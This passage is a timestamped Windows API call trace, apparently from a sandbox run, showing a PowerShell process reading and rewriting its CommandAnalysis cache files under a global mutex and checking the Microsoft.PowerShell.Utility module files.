pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0183.568] CoTaskMemFree (pv=0x1a9af8c0) [0183.568] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1b7dbbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0183.569] GetCurrentProcess () returned 0xffffffffffffffff [0183.569] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7dc0f8 | out: TokenHandle=0x1b7dc0f8*=0x6a8) returned 1 [0183.569] GetTokenInformation (in: TokenHandle=0x6a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1b7dc1f8 | out: TokenInformation=0x0, ReturnLength=0x1b7dc1f8) returned 0 [0183.569] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1a8844f0 [0183.569] GetTokenInformation (in: TokenHandle=0x6a8, TokenInformationClass=0x1, TokenInformation=0x1a8844f0, TokenInformationLength=0x2c, ReturnLength=0x1b7dc1f8 | out: TokenInformation=0x1a8844f0, ReturnLength=0x1b7dc1f8) returned 1 [0183.569] LocalFree (hMem=0x1a8844f0) returned 0x0 [0183.569] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x26a1a98, cbSid=0x1b7dc1f0 | out: pSid=0x26a1a98*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x1b7dc1f0) returned 1 [0183.569] CreateMutexW (lpMutexAttributes=0x26a1be8, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x6d0 [0183.569] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b7dc090*=0x6d0, lpdwindex=0x1b7dbe64 | out: lpdwindex=0x1b7dbe64) returned 0x0 [0183.606] CoTaskMemAlloc (cb=0x20e) returned 0x1a9b2780 [0183.606] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1a9b2780, nSize=0x105 | out: lpBuffer="") returned 0x0 [0183.607] CoTaskMemFree (pv=0x1a9b2780) [0183.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0x1b7dbca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0183.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc120) returned 1 [0183.607] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x26a6948 | out: lpFileInformation=0x26a6948*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0183.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dc0e0) returned 1 [0183.607] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b7dbb60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0183.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dbfa0) returned 1 [0183.608] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x1b7dc080 | out: lpFileInformation=0x1b7dc080*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47e545ef, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0183.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dbf60) returned 1 [0183.608] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x1b7dba00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0183.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dbee0) returned 1 [0183.608] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6d4 [0183.608] GetFileType (hFile=0x6d4) returned 0x1 [0183.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dbe50) returned 1 [0183.608] GetFileType (hFile=0x6d4) returned 0x1 [0183.609] ReadFile (in: hFile=0x6d4, lpBuffer=0x26a7f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dbd48, lpOverlapped=0x0 | out: lpBuffer=0x26a7f80*, lpNumberOfBytesRead=0x1b7dbd48*=0x8a2, lpOverlapped=0x0) returned 1 [0183.611] ReadFile (in: hFile=0x6d4, lpBuffer=0x26a7f80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dbd18, lpOverlapped=0x0 | out: lpBuffer=0x26a7f80*, lpNumberOfBytesRead=0x1b7dbd18*=0x0, lpOverlapped=0x0) returned 1 [0183.611] CloseHandle (hObject=0x6d4) returned 1 [0183.613] CoTaskMemAlloc (cb=0x20c) returned 0x1a9af480 [0183.613] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1a9af480 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0183.614] CoTaskMemFree (pv=0x1a9af480) [0183.614] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1b7dba40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0183.614] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b7dbbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0183.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dc020) returned 1 [0183.614] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x1b7dc100 | out: lpFileInformation=0x1b7dc100*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47e545ef, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0183.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dbfe0) returned 1 [0183.614] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6fe77092-4798-42ae-bda5-e7f822b580e9", nBufferLength=0x105, lpBuffer=0x1b7dba80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6fe77092-4798-42ae-bda5-e7f822b580e9", lpFilePart=0x0) returned 0x93 [0183.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dbf60) returned 1 [0183.614] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_6fe77092-4798-42ae-bda5-e7f822b580e9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_6fe77092-4798-42ae-bda5-e7f822b580e9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6d4 [0183.615] GetFileType (hFile=0x6d4) returned 0x1 [0183.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dbed0) returned 1 [0183.615] GetFileType (hFile=0x6d4) returned 0x1 [0183.615] SetEndOfFile (hFile=0x6d4) returned 1 [0184.524] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7da508 | out: phkResult=0x1b7da508*=0x0) returned 0x2 [0184.524] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7da508 | out: phkResult=0x1b7da508*=0x0) returned 0x2 [0184.820] WriteFile (in: hFile=0x6d4, lpBuffer=0x26fc060*, nNumberOfBytesToWrite=0x4a3, lpNumberOfBytesWritten=0x1b7dc078, lpOverlapped=0x0 | out: lpBuffer=0x26fc060*, lpNumberOfBytesWritten=0x1b7dc078*=0x4a3, lpOverlapped=0x0) returned 1 [0184.822] CloseHandle (hObject=0x6d4) returned 1 [0184.823] CoTaskMemAlloc (cb=0x20c) returned 0x1a9b2780 [0184.823] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1a9b2780 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0184.823] CoTaskMemFree (pv=0x1a9b2780) [0184.823] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1b7db9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0184.824] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b7dbb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0184.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dbfc0) returned 1 [0184.824] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x1b7dc0a0 | out: lpFileInformation=0x1b7dc0a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47e545ef, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0184.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dbf80) returned 1 [0184.824] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x1b7dba20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0184.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dbf00) returned 1 [0184.824] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6d4 [0184.824] GetFileType (hFile=0x6d4) returned 0x1 [0184.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dbe70) returned 1 [0184.824] GetFileType (hFile=0x6d4) returned 0x1 [0184.824] SetEndOfFile (hFile=0x6d4) returned 1 [0184.826] WriteFile (in: hFile=0x6d4, lpBuffer=0x26fe7d0*, nNumberOfBytesToWrite=0x8a2, lpNumberOfBytesWritten=0x1b7dc018, lpOverlapped=0x0 | out: lpBuffer=0x26fe7d0*, lpNumberOfBytesWritten=0x1b7dc018*=0x8a2, lpOverlapped=0x0) returned 1 [0184.827] CloseHandle (hObject=0x6d4) returned 1 [0184.829] ReleaseMutex (hMutex=0x6d0) returned 1 [0184.838] CoTaskMemAlloc (cb=0x20c) returned 0x1a9b2780 [0184.838] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1a9b2780 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0184.838] CoTaskMemFree (pv=0x1a9b2780) [0184.838] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1b7dd6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0184.838] CoTaskMemAlloc (cb=0x20e) returned 0x1a9afae0 [0184.838] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1a9afae0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0184.838] CoTaskMemFree (pv=0x1a9afae0) [0184.838] CoTaskMemAlloc (cb=0x20c) returned 0x1a9aee20 [0184.838] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1a9aee20 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0184.838] CoTaskMemFree (pv=0x1a9aee20) [0184.838] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x1b7dd630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0184.838] GetCurrentProcess () returned 0xffffffffffffffff [0184.838] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7ddae8 | out: TokenHandle=0x1b7ddae8*=0x6d4) returned 1 [0184.838] GetTokenInformation (in: TokenHandle=0x6d4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1b7ddbe8 | out: TokenInformation=0x0, ReturnLength=0x1b7ddbe8) returned 0 [0184.838] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1a884e70 [0184.839] GetTokenInformation (in: TokenHandle=0x6d4, TokenInformationClass=0x1, TokenInformation=0x1a884e70, TokenInformationLength=0x2c, ReturnLength=0x1b7ddbe8 | out: TokenInformation=0x1a884e70, ReturnLength=0x1b7ddbe8) returned 1 [0184.839] LocalFree (hMem=0x1a884e70) returned 0x0 [0184.839] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x27034c8, cbSid=0x1b7ddbe0 | out: pSid=0x27034c8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x1b7ddbe0) returned 1 [0184.839] CreateMutexW (lpMutexAttributes=0x2703618, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x6b8 [0184.839] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b7dda80*=0x6b8, lpdwindex=0x1b7dd854 | out: lpdwindex=0x1b7dd854) returned 0x0 [0184.840] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b7dd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0184.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dda00) returned 1 [0184.840] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddae0 | out: lpFileInformation=0x1b7ddae0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47e545ef, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0184.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd9c0) returned 1 [0184.840] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x1b7dd460, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0184.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd940) returned 1 [0184.840] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x69c [0184.840] GetFileType (hFile=0x69c) returned 0x1 [0184.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8b0) returned 1 [0184.840] GetFileType (hFile=0x69c) returned 0x1 [0184.840] ReadFile (in: hFile=0x69c, lpBuffer=0x27046e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dd7a8, lpOverlapped=0x0 | out: lpBuffer=0x27046e0*, lpNumberOfBytesRead=0x1b7dd7a8*=0x8a2, lpOverlapped=0x0) returned 1 [0184.842] ReadFile (in: hFile=0x69c, lpBuffer=0x27046e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dd778, lpOverlapped=0x0 | out: lpBuffer=0x27046e0*, lpNumberOfBytesRead=0x1b7dd778*=0x0, lpOverlapped=0x0) returned 1 [0184.842] CloseHandle (hObject=0x69c) returned 1 [0184.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0184.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddbd0) returned 1 [0184.843] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2707de8 | out: lpFileInformation=0x2707de8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0184.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddb90) returned 1 [0184.843] ReleaseMutex (hMutex=0x6b8) returned 1 [0184.843] GetCurrentProcess () returned 0xffffffffffffffff [0184.843] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7ddc18 | out: TokenHandle=0x1b7ddc18*=0x69c) returned 1 [0184.843] GetTokenInformation (in: TokenHandle=0x69c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1b7ddd18 | out: TokenInformation=0x0, ReturnLength=0x1b7ddd18) returned 0 [0184.843] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1a8841f0 [0184.843] GetTokenInformation (in: TokenHandle=0x69c, TokenInformationClass=0x1, TokenInformation=0x1a8841f0, TokenInformationLength=0x2c, ReturnLength=0x1b7ddd18 | out: TokenInformation=0x1a8841f0, ReturnLength=0x1b7ddd18) returned 1 [0184.843] LocalFree (hMem=0x1a8841f0) returned 0x0 [0184.843] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x2708a70, cbSid=0x1b7ddd10 | out: pSid=0x2708a70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x1b7ddd10) returned 1 [0184.844] CreateMutexW (lpMutexAttributes=0x2708bc0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x6d8 [0184.844] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1b7ddbb0*=0x6d8, lpdwindex=0x1b7dd984 | out: lpdwindex=0x1b7dd984) returned 0x0 [0184.846] CoTaskMemAlloc (cb=0x20e) returned 0x1a9afae0 [0184.846] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1a9afae0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0184.846] CoTaskMemFree (pv=0x1a9afae0) [0184.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0184.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddc40) returned 1 [0184.846] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2737520 | out: lpFileInformation=0x2737520*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0184.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddc00) returned 1 [0184.846] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b7dd680, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0184.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddac0) returned 1 [0184.846] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddba0 | out: lpFileInformation=0x1b7ddba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47e545ef, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0184.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda80) returned 1 [0184.847] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x1b7dd520, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0184.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dda00) returned 1 [0184.847] CreateFileW 